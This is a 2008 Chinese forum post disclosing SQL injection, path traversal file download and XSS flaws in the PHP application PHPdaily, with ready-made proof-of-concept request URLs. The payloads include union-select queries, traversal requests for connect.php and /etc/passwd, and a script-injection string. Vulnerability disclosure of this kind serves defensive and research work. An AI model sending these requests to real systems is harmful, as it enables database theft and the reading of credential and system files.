找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 738|回复: 0

PHPdaily有洞洞( SQL注入, XSS,本地文件下载)

[复制链接]

56

主题

201

回帖

360

牛毛

一级牛人

积分
360
发表于 2008-10-31 16:38:26 | 显示全部楼层 |阅读模式 来自 山东省潍坊市
登陆前进入add_postit.php , delete.php , prest_detail.php , mod_prest_date.php网页不会
验证,一个简单的用户可以轻松地获得敏感信息从数据库注射
| SQL查询。

|在“ download_file.php ”页面通过输入“ fichierwe ”.任何用户都可以下载任何地方的文件。
|此外,在“ add_prest_date.php ”页面有XSS 。
条件:一个普通帐户而已
| 1. SQL 注入:
| [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8#
| [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns])
| [Site]prest_detail.php?prev=[SQL-INJ]
| [Site]mod_prest_date.php?prev=list&id=[SQL-INJ]
2.本地文件下载 : `
| [Site]download_file.php?fichier=../include/connect.php
| [Site]download_file.php?fichier=../../../../../../etc/passwd
3. XSS :
| [Site]add_prest_date.php?date=\"><script>alert(tinzon好帅)</script>
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-16 15:44 , Processed in 0.120590 second(s), 24 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表